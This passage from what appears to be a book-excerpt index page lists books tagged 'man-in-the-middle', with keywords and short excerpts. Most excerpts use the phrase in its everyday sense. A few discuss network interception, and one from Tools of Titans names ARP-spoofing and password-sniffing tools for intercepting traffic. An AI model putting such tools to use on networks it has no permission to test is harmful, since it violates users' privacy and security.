https://apnews.com/743f86862f5a4b85844dcc10f96e3f8c. 100Guan Jianzhong, “The Strategic Choice of Chinese Credit Rating System,” Dagong Global (via Internet Archive), 2012, https://web.archive.org/web/20160805110146/http://en.dagongcredit.com/content/details58_6631.html. 101Ibid. 102“Man in the Middle,” South China Morning Post, April 26, 2014, https://www.scmp.com/business/china-business/article/1497241/man-middle. 103Ibid. 104Liz Mak, “China’s Dagong Global Credit Mounts Challenge to ‘Big Three’ Rating Agencies,” South China Morning Post, August 7, 2016, https://www.scmp.com/business/banking-finance/article/2000489/chinas-dagong-global-credit-mounts-challenge-big-three. 105Reports of Guan’s government ties are discussed in Christopher Ricking, “US Rating Agencies Face Chinese Challenge,” Deutsche Welle, November 19, 2012, https://www.dw.com/en/us-ratings-agencies-face-chinese-challenge/a-16389497; Guan Jianzhong, “The Strategic Choice of Chinese Credit Rating System.” 106Asit Ranjan Mishra, “China Not in Favor of BRICS Proposed Credit Rating Agency,” Livemint, October 14, 2014, https://www.livemint.com/Politics/btAFFggl1LoKBNZK0a45fJ/China-not-in-favour-of-proposed-Brics-credit-rating-agency.html. 107“Corporate Culture,” Dagong Global (via Internet Archive), 2016, https://web.archive.org/web/20160704062906/http://en.dagongcredit.com:80/about/culture.html. 108“About Us,” Dagong Global (via Internet Archive), 2016, https://web.archive.org/web/20160326131607/http://en.dagongcredit.com/about/aboutDagong.html.
The Collected Stories of Vernor Vinge by Vernor Vinge
anthropic principle, Asilomar, back-to-the-land, dematerialisation, gravity well, invisible hand, Ivan Sutherland, low earth orbit, Machinery of Freedom by David Friedman, MITM: man-in-the-middle, source of truth, technological singularity, unbiased observer, Vernor Vinge
Behind her, Grandmother stared in shocked silence. Sanda spun and ran toward the kitchen. Once they had the intruders locked out, what could she and Gran do without a phone? She nearly ran into him in the kitchen. Sanda sucked in a breath so hard she squeaked. He was big and hooded. He also had a knife. Strange to see such a man in the middle of the glistening white kitchen—the homey, comforting, safe kitchen. From the living room came the sound of splintering wood and Grandmother screamed. Running footsteps. Something metal being kicked over. Grandmother screamed again. “Shut your mouth, lady. I said, shut it.” The voice—though not the tone—was vaguely familiar.
Ubuntu 15.04 Server with systemd: Administration and Reference by Richard Petersen
Amazon Web Services, bash_history, cloud computing, Debian, Firefox, lock screen, Mark Shuttleworth, MITM: man-in-the-middle, OpenAI, operational security, RFC: Request For Comment, SpamAssassin, web application
The traceroute command will return a list of hosts the route traverses, along with the times for three probes sent to each gateway. Times greater than five seconds are displayed with an asterisk, *. traceroute rabbit.mytrek.com You can also use the mtr or xmtr tools to perform both ping and traces (Traceroute on the System Tools menu). Ettercap Ettercap is a sniffer program designed to detect Man in the Middle attacks. In this kind of attack, packets are detected and modified in transit to let an unauthorized user access a network. You can use either its graphical interface or its command line interface. Ettercap can perform Unified sniffing on all connections, or Bridged sniffing on a connection between network interfaces.
Age of Greed: The Triumph of Finance and the Decline of America, 1970 to the Present by Jeff Madrick
Abraham Maslow, accounting loophole / creative accounting, Alan Greenspan, AOL-Time Warner, Asian financial crisis, bank run, Bear Stearns, book value, Bretton Woods, business cycle, capital controls, Carl Icahn, collapse of Lehman Brothers, collateralized debt obligation, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, currency risk, desegregation, disintermediation, diversified portfolio, Donald Trump, financial deregulation, fixed income, floating exchange rates, Frederick Winslow Taylor, full employment, George Akerlof, Glass-Steagall Act, Greenspan put, Hyman Minsky, income inequality, index fund, inflation targeting, inventory management, invisible hand, John Bogle, John Meriwether, junk bonds, Kitchen Debate, laissez-faire capitalism, locking in a profit, Long Term Capital Management, low interest rates, market bubble, Mary Meeker, Michael Milken, minimum wage unemployment, MITM: man-in-the-middle, Money creation, money market fund, Mont Pelerin Society, moral hazard, mortgage debt, Myron Scholes, new economy, Nixon triggered the end of the Bretton Woods system, North Sea oil, Northern Rock, oil shock, Paul Samuelson, Philip Mirowski, Phillips curve, price stability, quantitative easing, Ralph Nader, rent control, road to serfdom, Robert Bork, Robert Shiller, Ronald Coase, Ronald Reagan, Ronald Reagan: Tear down this wall, scientific management, shareholder value, short selling, Silicon Valley, Simon Kuznets, tail risk, Tax Reform Act of 1986, technology bubble, Telecommunications Act of 1996, The Chicago School, The Great Moderation, too big to fail, union organizing, V2 rocket, value at risk, Vanguard fund, War on Poverty, Washington Consensus, Y2K, Yom Kippur War
Financial writer Michael Lewis, then a Salomon novice, in his first-person account of working at Salomon Brothers in these years, quoted Dall as saying of Ranieri, “He was tough-minded. He didn’t mind hiding a million-dollar loss from a manager, if that’s what it took. He didn’t let morality get in his way. Well, morality is not the right word, but you know what I mean.” Trading was the key to profits in the new mortgage department. Ranieri, the man in the middle, had the information about supply and demand and also the deep financial pockets of a house like Salomon. Ranieri was not merely aggressive and willing to cut corners; he was by every account smart. “I have never seen anyone, educated or uneducated, with a quicker mind,” said Dall, whom Ranieri eventually forced out of the department.
Facebook: The Inside Story by Steven Levy
active measures, Airbnb, Airbus A320, Amazon Mechanical Turk, AOL-Time Warner, Apple's 1984 Super Bowl advert, augmented reality, Ben Horowitz, Benchmark Capital, Big Tech, Black Lives Matter, Blitzscaling, blockchain, Burning Man, business intelligence, Cambridge Analytica, cloud computing, company town, computer vision, crowdsourcing, cryptocurrency, data science, deep learning, disinformation, don't be evil, Donald Trump, Dunbar number, East Village, Edward Snowden, El Camino Real, Elon Musk, end-to-end encryption, fake news, Firefox, Frank Gehry, Geoffrey Hinton, glass ceiling, GPS: selective availability, growth hacking, imposter syndrome, indoor plumbing, information security, Jeff Bezos, John Markoff, Jony Ive, Kevin Kelly, Kickstarter, lock screen, Lyft, machine translation, Mahatma Gandhi, Marc Andreessen, Marc Benioff, Mark Zuckerberg, Max Levchin, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, move fast and break things, natural language processing, Network effects, Oculus Rift, operational security, PageRank, Paul Buchheit, paypal mafia, Peter Thiel, pets.com, post-work, Ray Kurzweil, recommendation engine, Robert Mercer, Robert Metcalfe, rolodex, Russian election interference, Salesforce, Sam Altman, Sand Hill Road, self-driving car, sexual politics, Sheryl Sandberg, Shoshana Zuboff, side project, Silicon Valley, Silicon Valley startup, skeuomorphism, slashdot, Snapchat, social contagion, social graph, social software, South of Market, San Francisco, Startup school, Steve Ballmer, Steve Bannon, Steve Jobs, Steven Levy, Steven Pinker, surveillance capitalism, tech billionaire, techlash, Tim Cook: Apple, Tragedy of the Commons, web application, WeWork, WikiLeaks, women in the workforce, Y Combinator, Y2K, you are the product
Facebook now had a powerful way to monitor the mobile activity of thousands of users. The Growth team would study the data carefully, and post results in their regular meetings. Onavo paid special attention to Snapchat. Evan Spiegel’s company had security features to block intruders, but according to one Facebook executive, Onavo used a “man-in-the-middle” attack to get past the wall and gather data. Snapchat discovered this and put in protections to thwart the intrusions. With Onavo, a Facebook executive confirmed to me, the company was “able to inject code into Snap and could see how people were actually using the product internally.” (According to The Wall Street Journal, Snapchat would add this episode to a file it kept of Facebook’s actions, calling it “Project Voldemort,” after the Harry Potter villain whose name cannot be spoken.)
The Story of Philosophy by Will Durant
George Santayana, Gregor Mendel, Henri Poincaré, Isaac Newton, long peace, mass immigration, means of production, MITM: man-in-the-middle, music of the spheres, Plato's cave, plutocrats, science of happiness, Socratic dialogue, the market place, the scientific method
Sometimes this is well; for if we are conscious of erring in one extreme “we should aim at the other, and so we may reach the middle position, . . . as men do in straightening bent timber.”53 But unconscious extremists look upon the golden mean as the greatest vice; they “expel towards each other the man in the middle position; the brave man is called rash by the coward, and cowardly by the rash man, and in other cases accordingly”;54 so in modern politics the “liberal” is called “conservative” and “radical” by the radical and the conservative. It is obvious that this doctrine of the mean is the formulation of a characteristic attitude which appears in almost every system of Greek philosophy.
Look Homeward, Angel by Thomas Wolfe
cakes and ale, cotton gin, fear of failure, index card, MITM: man-in-the-middle, Own Your Own Home
You're doing good work, my boy, and you're getting something out of it. It's worth it, isn't it?" "Yes," said Eugene gratefully, "it certainly is--" By far the most distinguished of his teachers this first year was Mr. Edward Pettigrew ("Buck") Benson, the Greek professor. Buck Benson was a little man in the middle-forties, a bachelor, somewhat dandified, but old-fashioned, in his dress. He wore wing collars, large plump cravats, and suede-topped shoes. His hair was thick, heavily grayed, beautifully kept. His face was courteously pugnacious, fierce, with large yellow bulging eyeballs, and several bulldog pleatings around the mouth.
Tools of Titans: The Tactics, Routines, and Habits of Billionaires, Icons, and World-Class Performers by Timothy Ferriss
Abraham Maslow, Adam Curtis, Airbnb, Alexander Shulgin, Alvin Toffler, An Inconvenient Truth, artificial general intelligence, asset allocation, Atul Gawande, augmented reality, back-to-the-land, Ben Horowitz, Bernie Madoff, Bertrand Russell: In Praise of Idleness, Beryl Markham, billion-dollar mistake, Black Swan, Blue Bottle Coffee, Blue Ocean Strategy, blue-collar work, book value, Boris Johnson, Buckminster Fuller, business process, Cal Newport, call centre, caloric restriction, Carl Icahn, Charles Lindbergh, Checklist Manifesto, cognitive bias, cognitive dissonance, Colonization of Mars, Columbine, commoditize, correlation does not imply causation, CRISPR, David Brooks, David Graeber, deal flow, digital rights, diversification, diversified portfolio, do what you love, Donald Trump, effective altruism, Elon Musk, fail fast, fake it until you make it, fault tolerance, fear of failure, Firefox, follow your passion, fulfillment center, future of work, Future Shock, Girl Boss, Google X / Alphabet X, growth hacking, Howard Zinn, Hugh Fearnley-Whittingstall, Jeff Bezos, job satisfaction, Johann Wolfgang von Goethe, John Markoff, Kevin Kelly, Kickstarter, Lao Tzu, lateral thinking, life extension, lifelogging, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, Mason jar, Menlo Park, microdosing, Mikhail Gorbachev, MITM: man-in-the-middle, Neal Stephenson, Nelson Mandela, Nicholas Carr, Nick Bostrom, off-the-grid, optical character recognition, PageRank, Paradox of Choice, passive income, pattern recognition, Paul Graham, peer-to-peer, Peter H. Diamandis: Planetary Resources, Peter Singer: altruism, Peter Thiel, phenotype, PIHKAL and TIHKAL, post scarcity, post-work, power law, premature optimization, private spaceflight, QWERTY keyboard, Ralph Waldo Emerson, Ray Kurzweil, recommendation engine, rent-seeking, Richard Feynman, risk tolerance, Ronald Reagan, Salesforce, selection bias, sharing economy, side project, Silicon Valley, skunkworks, Skype, Snapchat, Snow Crash, social graph, software as a service, software is eating the world, stem cell, Stephen Hawking, Steve Jobs, Stewart Brand, superintelligent machines, TED Talk, Tesla Model S, The future is already here, the long tail, The Wisdom of Crowds, Thomas L Friedman, traumatic brain injury, trolley problem, vertical integration, Wall-E, Washington Consensus, We are as Gods, Whole Earth Catalog, Y Combinator, zero-sum game
To learn about some of the starting tools a hacker, attacker, or someone just curious about security would use, I’d suggest looking at beginning tools such as Wireshark, Charles (web debugging proxy), NightHawk (ARP/ND spoofing and password sniffing), arpy (ARP spoofing), dsniff (password sniffing), and Kali Linux (penetration testing) and looking up tutorials on network intrusion, sniffing, and man-in-the-middling. Within a few minutes and with a tool like Wireshark, you can start seeing all the traffic going in and out of your computer, while tools like Nighthawk and arpy in conjunction with Wireshark can help you inspect and intercept all traffic on a network! To further dive into security, I’d suggest learning to program.
The Oil Kings: How the U.S., Iran, and Saudi Arabia Changed the Balance of Power in the Middle East by Andrew Scott Cooper
addicted to oil, Alan Greenspan, An Inconvenient Truth, anti-communist, Ayatollah Khomeini, banking crisis, Boycotts of Israel, energy security, falling living standards, friendly fire, full employment, Future Shock, Great Leap Forward, guns versus butter model, interchangeable parts, Kickstarter, land reform, MITM: man-in-the-middle, oil shale / tar sands, oil shock, peak oil, Ponzi scheme, Post-Keynesian economics, RAND corporation, rising living standards, Robert Bork, rolodex, Ronald Reagan, Seymour Hersh, strikebreaker, unbiased observer, uranium enrichment, urban planning, Yom Kippur War
Ford Library. 284 $20 million over five years: Pranay Gupte, “Lobbyists in Iran Paid by Grumman,” New York Times, December 13, 1975. 284 “It was normal practice”: Ibid. 284 Members of Congress demanded to know: Ibid. 284 second $200 million loan offered: Ibid. 284 an audit prepared by Northrop Corporation’s accounting firm: Ibid. 284 $200 million in kickbacks: Michael C. Jensen, “Bribes by Northrop of $450,000 for 2 Saudi Generals Reported,” New York Times, June 5, 1975. 284 Prominent among the “sales agents”: William H. Jones, “Northrop’s Man in the Middle East,” Washington Post, June 7, 1975. 284 leveraged his background in intelligence: David Binder, “Northrop Cites Undercover Role,” New York Times, June 7, 1975. 284 “running close to a billion dollars”: Ibid. 284 “old personal friend”: Ibid. 284 “The Shah could not have been more cordial personally”: Ibid. 284 Roosevelt to ask the Shah to lobby: Gaylord Shaw, “Senate Unit Tells of More Northrop Payoffs Abroad,” Los Angeles Times, June 7, 1975. 285 paid $2,697,067: Martin R.
Werner Herzog - a Guide for the Perplexed: Conversations With Paul Cronin by Paul Cronin
Albert Einstein, Atahualpa, Berlin Wall, classic study, Dr. Strangelove, Francisco Pizarro, Kickstarter, land reform, MITM: man-in-the-middle, out of africa, Pier Paolo Pasolini
He and a co-conspirator were about to be busted, so he started pushing his colleague aggressively, shouting things like, “You’re doing a lousy job! What’s the matter with you? I told you Tuesday, not Wednesday!” The two of them stormed off and the guard didn’t dare say anything. No one wants to interfere with a man in the middle of a fight. Philippe pointed out that the opposite also works, that people won’t bother you when you’re laughing your heart out. A participant at one Rogue session was a former hostage negotiator; he’ll surely make a fine filmmaker. Another told us the story of a film he was making in Portugal about street kids.
America in the World by Robert B. Zoellick
Albert Einstein, anti-communist, banking crisis, battle of ideas, Berlin Wall, Bretton Woods, British Empire, classic study, Corn Laws, coronavirus, cuban missile crisis, defense in depth, Deng Xiaoping, Donald Trump, Douglas Engelbart, energy security, European colonialism, facts on the ground, Fall of the Berlin Wall, foreign exchange controls, Great Leap Forward, guns versus butter model, hypertext link, Ida Tarbell, illegal immigration, immigration reform, imperial preference, Isaac Newton, Joseph Schumpeter, land reform, linear model of innovation, Mikhail Gorbachev, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, Nixon triggered the end of the Bretton Woods system, Norbert Wiener, Paul Samuelson, public intellectual, RAND corporation, reserve currency, Ronald Reagan, Ronald Reagan: Tear down this wall, scientific management, Scramble for Africa, Silicon Valley, Strategic Defense Initiative, The Wealth of Nations by Adam Smith, trade liberalization, transcontinental railway, undersea cable, Vannevar Bush, War on Poverty
Vandenberg: From Isolation to International Engagement (Lexington, KY: University Press of Kentucky, 2015), 87 (citing Vandenberg’s papers) and 169. 40. See Haas, Harry and Arthur, 2 for forty-seven days; Kaplan, Conversion, 1–3 (citing James Reston in 1948 on “qualities of enterprise”); and Hendrik Meijer, Arthur Vandenberg: The Man in the Middle of the American Century (Chicago: University of Chicago Press, 2017), 4–6, 70, 119. 41. Meijer, Vandenberg, 4. 42. Meijer, Vandenberg, 6–9; Kaplan, Conversion, 2–4. 43. Kaplan, Conversion, 3–4, 8, 11–14; Meijer, Vandenberg, 16. 44. Vandenberg believed that Alexander Hamilton represented a superior mix of nationalism, conservativism, and progressivism.
The Stack: On Software and Sovereignty by Benjamin H. Bratton
1960s counterculture, 3D printing, 4chan, Ada Lovelace, Adam Curtis, additive manufacturing, airport security, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, algorithmic trading, Amazon Mechanical Turk, Amazon Robotics, Amazon Web Services, Andy Rubin, Anthropocene, augmented reality, autonomous vehicles, basic income, Benevolent Dictator For Life (BDFL), Berlin Wall, bioinformatics, Biosphere 2, bitcoin, blockchain, Buckminster Fuller, Burning Man, call centre, capitalist realism, carbon credits, carbon footprint, carbon tax, carbon-based life, Cass Sunstein, Celebration, Florida, Charles Babbage, charter city, clean water, cloud computing, company town, congestion pricing, connected car, Conway's law, corporate governance, crowdsourcing, cryptocurrency, dark matter, David Graeber, deglobalization, dematerialisation, digital capitalism, digital divide, disintermediation, distributed generation, don't be evil, Douglas Engelbart, driverless car, Edward Snowden, Elon Musk, en.wikipedia.org, Eratosthenes, Ethereum, ethereum blockchain, Evgeny Morozov, facts on the ground, Flash crash, Frank Gehry, Frederick Winslow Taylor, fulfillment center, functional programming, future of work, Georg Cantor, gig economy, global supply chain, Google Earth, Google Glasses, Guggenheim Bilbao, High speed trading, high-speed rail, Hyperloop, Ian Bogost, illegal immigration, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invisible hand, Jacob Appelbaum, James Bridle, Jaron Lanier, Joan Didion, John Markoff, John Perry Barlow, Joi Ito, Jony Ive, Julian Assange, Khan Academy, Kim Stanley Robinson, Kiva Systems, Laura Poitras, liberal capitalism, lifelogging, linked data, lolcat, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, McMansion, means of production, megacity, megaproject, megastructure, Menlo Park, Minecraft, MITM: man-in-the-middle, Monroe Doctrine, Neal Stephenson, Network effects, new economy, Nick Bostrom, ocean acidification, off-the-grid, offshore financial centre, oil shale / tar sands, Oklahoma City bombing, OSI model, packet switching, PageRank, pattern recognition, peak oil, peer-to-peer, performance metric, personalized medicine, Peter Eisenman, Peter Thiel, phenotype, Philip Mirowski, Pierre-Simon Laplace, place-making, planetary scale, pneumatic tube, post-Fordism, precautionary principle, RAND corporation, recommendation engine, reserve currency, rewilding, RFID, Robert Bork, Sand Hill Road, scientific management, self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley ideology, skeuomorphism, Slavoj Žižek, smart cities, smart grid, smart meter, Snow Crash, social graph, software studies, South China Sea, sovereign wealth fund, special economic zone, spectrum auction, Startup school, statistical arbitrage, Steve Jobs, Steven Levy, Stewart Brand, Stuxnet, Superbowl ad, supply-chain management, supply-chain management software, synthetic biology, TaskRabbit, technological determinism, TED Talk, the built environment, The Chicago School, the long tail, the scientific method, Torches of Freedom, transaction costs, Turing complete, Turing machine, Turing test, undersea cable, universal basic income, urban planning, Vernor Vinge, vertical integration, warehouse automation, warehouse robotics, Washington Consensus, web application, Westphalian system, WikiLeaks, working poor, Y Combinator, yottabyte
For Sino-Google geopolitics, the platform could theoretically be available at a billion-user scale to those who live in China, even if Google is not technically “in China,” because those Users, acting through and as foreign proxies, are themselves, as far as the Internet geography is concerned, both in and not in China. Developers of uProxy believe that it would take two simultaneous and synchronized man-in-the-middle attacks to hack the link, and at population scale, that should prove difficult even for the best state actors, for now. (More disconcerting perhaps is that such a framework could just as easily be used to withdraw data from a paired site—a paired “user”—that for good reasons should be left alone.)
A History of Zionism by Walter Laqueur
Albert Einstein, anti-communist, British Empire, business cycle, illegal immigration, joint-stock company, land reform, Mahatma Gandhi, mass immigration, means of production, MITM: man-in-the-middle, Mount Scopus, new economy, plutocrats, profit motive, strikebreaker, Suez canal 1869, the market place, éminence grise
Many liberals and Socialists felt that national distinctions were losing their importance all over the world, and that the Jews, because they had no national home, would be in the vanguard of this movement towards one global culture, one way of life. They did not share the belief that God had created peoples to exist forever and that each of them had an eternal mission. One of the heroes in Gottfried Keller’s Fähnlein der sieben Aufrechten, a stalwart Swiss patriot, raised the question in discussion with his friends: Just as a man in the middle of his life and at the height of his strength will think of death, so he should consider in a quiet hour that his fatherland will vanish one day … because everything in this world is subject to change … is it not true that greater nations than ours have perished? Or do you want to continue existing like the Eternal Jew who cannot die, who has buried Egypt, Greece, and Rome and is still serving the newly emerged peoples?
George Marshall: Defender of the Republic by David L. Roll
anti-communist, Bletchley Park, British Empire, Charles Lindbergh, Cornelius Vanderbilt, David Brooks, Defenestration of Prague, Donald Trump, European colonialism, fear of failure, invisible hand, MITM: man-in-the-middle, Monroe Doctrine, mutually assured destruction, one-China policy, one-state solution, Ralph Waldo Emerson, Simon Kuznets, South China Sea, Steve Jobs, Suez canal 1869, trade liberalization, Works Progress Administration, yellow journalism
Louis Johnson and the Arming of America: The Roosevelt and Truman Years. Bloomington: Indiana University Press, 2005. Medoff, Rafael. Jewish Americans and Political Participation. Santa Barbara, CA: ABC-CLIO, 2002. Mee, Charles L. Jr. The Marshall Plan. New York: Simon & Schuster, 1984. Meijer, Hendrik. Arthur Vandenberg: The Man in the Middle of the American Century. Chicago: University of Chicago Press, 2017. Melby, John F. The Mandate of Heaven: Record of a Civil War, China 1945–49. Garden City, NY: Anchor Books, 1971. Miller, Merle. Plain Speaking: An Oral Biography of Harry S. Truman. New York: Black Dog & Leventhal, 2005.
Dhalgren by Samuel R. Delany
MITM: man-in-the-middle, sexual politics
A climb across rocks and among green brush jarred it loose again. Cathedral told Priest the black stone building in the smoke was the Weather Tower. I still don't see any vanes, aerials, or anemometers. We came around a corner, left hips brushing head-sized stones, right hips (elbows up) scratched by bushes. The man in the middle of the court was bent over a tripod. As we came toward him, he looked up: Captain Kamp. Who still didn't recognize me until we were on top of him. "…Kid?" "Hello, Captain." He laughed now. "Now you fellows looked pretty ominous coming across there." He debated whether to give his hand for shaking.
Demanding the Impossible: A History of Anarchism by Peter Marshall
agricultural Revolution, anti-communist, anti-globalists, Bertrand Russell: In Praise of Idleness, classic study, clean water, collective bargaining, colonial rule, David Graeber, different worldview, do-ocracy, feminist movement, garden city movement, gentleman farmer, Great Leap Forward, Herbert Marcuse, hive mind, Howard Zinn, intentional community, invisible hand, laissez-faire capitalism, land reform, land tenure, Lao Tzu, Lewis Mumford, liberation theology, Machinery of Freedom by David Friedman, Mahatma Gandhi, means of production, military-industrial complex, MITM: man-in-the-middle, Murray Bookchin, Naomi Klein, open borders, Panopticon Jeremy Bentham, plutocrats, post scarcity, profit motive, public intellectual, radical decentralization, Ralph Waldo Emerson, rewilding, road to serfdom, Ronald Reagan, sexual politics, the market place, union organizing, wage slave, washing machines reduced drudgery
Woodcock has suggested that in their view of man’s place in the world, anarchists believed in a modified version of the Great Chain of Being.9 In fact, the conception of the universe as a Chain of Being, and the principles which underline this conception — plenitude, continuity, and gradation — were deeply conservative. Moreover, the hierarchical cosmogony of the Chain of Being, with its gradations from beast to angels with man in the middle, reflected the social hierarchy of the period. In the eighteenth century, it led to the belief that there could be no improvement in the organization of society and to Pope’s conclusion that ‘whatever is, is right’.10 Indeed, it was only towards the end of the eighteenth century when the static notion of a Chain of Being was temporalized and replaced by a more evolutionary view of nature that progressive thinkers began to appeal to nature as a touchstone to illustrate the shortcomings of modern civilization.
Reamde by Neal Stephenson
air freight, airport security, autism spectrum disorder, book value, crowdsourcing, digital map, drone strike, Google Earth, industrial robot, informal economy, Jones Act, large denomination, megacity, messenger bag, MITM: man-in-the-middle, Neal Stephenson, new economy, off-the-grid, pattern recognition, Ponzi scheme, pre–internet, ransomware, restrictive zoning, scientific management, side project, Skype, slashdot, Snow Crash, South China Sea, SQL injection, the built environment, the scientific method, young professional
Sokolov was leading the way, but as they passed 503 he looked over his shoulder and made room for Kautsky, the biggest man in the squad, the door breaker. Kautsky was armed with a combination sledge-hammer/ax/crowbar that could make short work of any door. The ones in this building looked particularly flimsy, so Sokolov had no worries about getting through rapidly. Kautsky would be their man in the middle, the first one through, who would hold the center and block the exit while the others flooded in behind him and flowed to the edges. Ivanov had no scripted part in this plan, since he was supposed to be waiting down in the van, but Sokolov hoped that he would have the good sense to stay well to the rear, in the hallway, long enough for things to get under control.
The system of the world by Neal Stephenson
bank run, British Empire, cellular automata, Edmond Halley, Fellow of the Royal Society, high net worth, Isaac Newton, James Watt: steam engine, joint-stock company, land bank, large denomination, MITM: man-in-the-middle, Neal Stephenson, place-making, Snow Crash, the market place, three-masted sailing ship, trade route, transatlantic slave trade
Indeed many were now staring at it, for it was smoking. And it was making booms as the passenger flailed against the roof, signalling the driver to stop. The door on the right side flew open and disgorged a cloud of brown-gray smoke. So dense and voluminous was this, that a long and careful inspection was needed to see that there was a man in the middle of it. He was staggering away from the carriage, headed for the parapet that surrounded the Square to limit the number of pedestrians who toppled into St. Mary’s Lock. The passenger looked like a figure from Ovid: a Cloud metamorphosing into a Man. For the smoke had saturated the long hooded cloak that he wore, and was still billowing out of it.
Wealth and Poverty of Nations by David S. Landes
Admiral Zheng, affirmative action, agricultural Revolution, Atahualpa, Ayatollah Khomeini, Bartolomé de las Casas, book value, British Empire, business cycle, Cape to Cairo, classic study, clean water, colonial rule, Columbian Exchange, computer age, David Ricardo: comparative advantage, deindustrialization, deskilling, European colonialism, Fellow of the Royal Society, financial intermediation, Francisco Pizarro, germ theory of disease, glass ceiling, high-speed rail, illegal immigration, income inequality, Index librorum prohibitorum, interchangeable parts, invention of agriculture, invention of movable type, invisible hand, Isaac Newton, it's over 9,000, James Watt: steam engine, John Harrison: Longitude, joint-stock company, Just-in-time delivery, Kenneth Arrow, land tenure, lateral thinking, Lewis Mumford, mass immigration, Mexican peso crisis / tequila crisis, MITM: man-in-the-middle, Monroe Doctrine, Murano, Venice glass, new economy, New Urbanism, North Sea oil, out of africa, passive investing, Paul Erdős, Paul Samuelson, Philip Mirowski, rent-seeking, Right to Buy, Robert Solow, Savings and loan crisis, Scramble for Africa, Simon Kuznets, South China Sea, spice trade, spinning jenny, Suez canal 1869, The Wealth of Nations by Adam Smith, trade route, transaction costs, transatlantic slave trade, Vilfredo Pareto, zero-sum game
When Columbus met his first Indians, he could not get over their trust and friendliness; to this the Spaniards, frustrated for gold, returned bestialities unworthy of beasts: They came with their Horsemen well armed with Sword and Launce, making most cruel havocks and slaughters. . . . Overrunning Cities and Villages, where they spared no sex nor age; neither would their cruelty pity Women with childe, whose bellies they would rip up, taking out the Infant to hew it in pieces. They would often lay wagers who should with most dexterity either cleave or cut a man in the middle. . . . The children they would take by the feet and dash their innocent heads against the rocks, and when they were fallen into the water, with a strange and cruel derision they would call on them to swim. . . . They erected certains Gallowses . . . upon every one of which they would hang thirteen persons, blasphemously affirming that they did it in honour of our Redeemer and his Apostles, and then putting fire under them, they burnt the poor wretches alive.